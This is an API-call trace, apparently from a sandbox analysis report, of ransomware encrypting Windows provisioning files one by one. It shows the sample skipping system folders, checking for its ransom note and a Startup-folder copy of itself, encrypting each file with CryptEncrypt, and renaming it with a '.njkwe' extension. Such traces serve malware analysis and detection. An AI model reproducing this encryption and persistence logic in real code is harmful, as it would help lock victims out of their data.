(lpString1="190__Connections_Cellular_Siminn hf (Iceland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.206] lstrcmpW (lpString1="190__Connections_Cellular_Siminn hf (Iceland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.206] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\190__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.206] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\190__Connections_Cellular_Siminn hf (Iceland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\190__connections_cellular_siminn hf (iceland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.207] GetTickCount () returned 0x1153a37 [0077.207] GetTickCount () returned 0x1153a37 [0077.207] GetTickCount () returned 0x1153a37 [0077.207] GetTickCount () returned 0x1153a37 [0077.207] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.207] GetProcessHeap () returned 0xbe0000 [0077.207] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.207] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x285, lpOverlapped=0x0) returned 1 [0077.208] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.208] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x285, lpOverlapped=0x0) returned 1 [0077.208] GetProcessHeap () returned 0xbe0000 [0077.208] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.208] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.208] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.209] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.209] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.209] CloseHandle (hObject=0x43c) returned 1 [0077.209] GetProcessHeap () returned 0xbe0000 [0077.209] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.209] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\190__Connections_Cellular_Siminn hf (Iceland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0077.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\190__Connections_Cellular_Siminn hf (Iceland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\190__connections_cellular_siminn hf (iceland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\190__Connections_Cellular_Siminn hf (Iceland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\190__connections_cellular_siminn hf (iceland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.209] GetProcessHeap () returned 0xbe0000 [0077.209] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.209] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90732eea, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90732eea, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90732eea, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="191__Connections_Cellular_Vodafone Iceland (Iceland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="191__C~1.PRO")) returned 1 [0077.209] lstrcmpiW (lpString1="191__Connections_Cellular_Vodafone Iceland (Iceland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.209] lstrcmpiW (lpString1="191__Connections_Cellular_Vodafone Iceland (Iceland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.210] lstrcmpiW (lpString1="191__Connections_Cellular_Vodafone Iceland (Iceland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.210] lstrcmpiW (lpString1="191__Connections_Cellular_Vodafone Iceland (Iceland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.210] lstrcmpiW (lpString1="191__Connections_Cellular_Vodafone Iceland (Iceland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.210] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\191__Connections_Cellular_Vodafone Iceland (Iceland)_i0$(__MVID)@WAP.provxml") returned 170 [0077.210] StrStrIW (lpFirst="191__Connections_Cellular_Vodafone Iceland (Iceland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.210] lstrcmpW (lpString1="191__Connections_Cellular_Vodafone Iceland (Iceland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.210] lstrcmpW (lpString1="191__Connections_Cellular_Vodafone Iceland (Iceland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.210] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\191__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.210] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\191__Connections_Cellular_Vodafone Iceland (Iceland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\191__connections_cellular_vodafone iceland (iceland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.210] GetTickCount () returned 0x1153a37 [0077.210] GetTickCount () returned 0x1153a37 [0077.210] GetTickCount () returned 0x1153a37 [0077.210] GetTickCount () returned 0x1153a37 [0077.210] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.210] GetProcessHeap () returned 0xbe0000 [0077.210] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.210] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0077.211] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.212] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0077.212] GetProcessHeap () returned 0xbe0000 [0077.212] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.212] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.212] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.212] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.212] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.212] CloseHandle (hObject=0x43c) returned 1 [0077.212] GetProcessHeap () returned 0xbe0000 [0077.212] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.212] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\191__Connections_Cellular_Vodafone Iceland (Iceland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 190 [0077.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\191__Connections_Cellular_Vodafone Iceland (Iceland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\191__connections_cellular_vodafone iceland (iceland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\191__Connections_Cellular_Vodafone Iceland (Iceland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\191__connections_cellular_vodafone iceland (iceland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.213] GetProcessHeap () returned 0xbe0000 [0077.213] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.213] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90732eea, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90732eea, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90732eea, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="192__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="192__C~1.PRO")) returned 1 [0077.214] lstrcmpiW (lpString1="192__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0077.214] lstrcmpiW (lpString1="192__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0077.215] lstrcmpiW (lpString1="192__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0077.215] lstrcmpiW (lpString1="192__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0077.215] lstrcmpiW (lpString1="192__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0077.215] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\192__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0077.215] StrStrIW (lpFirst="192__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0077.215] lstrcmpW (lpString1="192__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.215] lstrcmpW (lpString1="192__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0077.215] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\192__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.215] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\192__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\192__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.215] GetTickCount () returned 0x1153a37 [0077.215] GetTickCount () returned 0x1153a37 [0077.215] GetTickCount () returned 0x1153a37 [0077.215] GetTickCount () returned 0x1153a37 [0077.216] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.216] GetProcessHeap () returned 0xbe0000 [0077.216] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.216] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0077.217] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.217] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0077.217] GetProcessHeap () returned 0xbe0000 [0077.217] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.217] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.217] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.218] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.218] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.218] CloseHandle (hObject=0x43c) returned 1 [0077.218] GetProcessHeap () returned 0xbe0000 [0077.218] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.218] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\192__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0077.218] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\192__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\192__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\192__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\192__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.219] GetProcessHeap () returned 0xbe0000 [0077.219] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.219] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90732eea, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90732eea, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90732eea, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="193__Connections_Cellular_Aircel (India)_i0$(__MVID)@WAP.provxml", cAlternateFileName="193__C~1.PRO")) returned 1 [0077.219] lstrcmpiW (lpString1="193__Connections_Cellular_Aircel (India)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.219] lstrcmpiW (lpString1="193__Connections_Cellular_Aircel (India)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.219] lstrcmpiW (lpString1="193__Connections_Cellular_Aircel (India)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.219] lstrcmpiW (lpString1="193__Connections_Cellular_Aircel (India)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.219] lstrcmpiW (lpString1="193__Connections_Cellular_Aircel (India)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.219] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\193__Connections_Cellular_Aircel (India)_i0$(__MVID)@WAP.provxml") returned 158 [0077.219] StrStrIW (lpFirst="193__Connections_Cellular_Aircel (India)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.219] lstrcmpW (lpString1="193__Connections_Cellular_Aircel (India)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.219] lstrcmpW (lpString1="193__Connections_Cellular_Aircel (India)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.219] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\193__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.219] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\193__Connections_Cellular_Aircel (India)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\193__connections_cellular_aircel (india)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.219] GetTickCount () returned 0x1153a46 [0077.219] GetTickCount () returned 0x1153a46 [0077.219] GetTickCount () returned 0x1153a46 [0077.219] GetTickCount () returned 0x1153a46 [0077.219] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.220] GetProcessHeap () returned 0xbe0000 [0077.220] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.220] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0077.221] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.221] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c3, lpOverlapped=0x0) returned 1 [0077.221] GetProcessHeap () returned 0xbe0000 [0077.221] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.221] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.221] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.221] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.221] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.221] CloseHandle (hObject=0x43c) returned 1 [0077.222] GetProcessHeap () returned 0xbe0000 [0077.222] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.222] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\193__Connections_Cellular_Aircel (India)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 178 [0077.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\193__Connections_Cellular_Aircel (India)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\193__connections_cellular_aircel (india)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\193__Connections_Cellular_Aircel (India)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\193__connections_cellular_aircel (india)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.222] GetProcessHeap () returned 0xbe0000 [0077.222] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.222] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90759156, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90759156, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90759156, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="194__Connections_Cellular_Airtel (India)_i0$(__MVID)@WAP.provxml", cAlternateFileName="194__C~1.PRO")) returned 1 [0077.222] lstrcmpiW (lpString1="194__Connections_Cellular_Airtel (India)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.222] lstrcmpiW 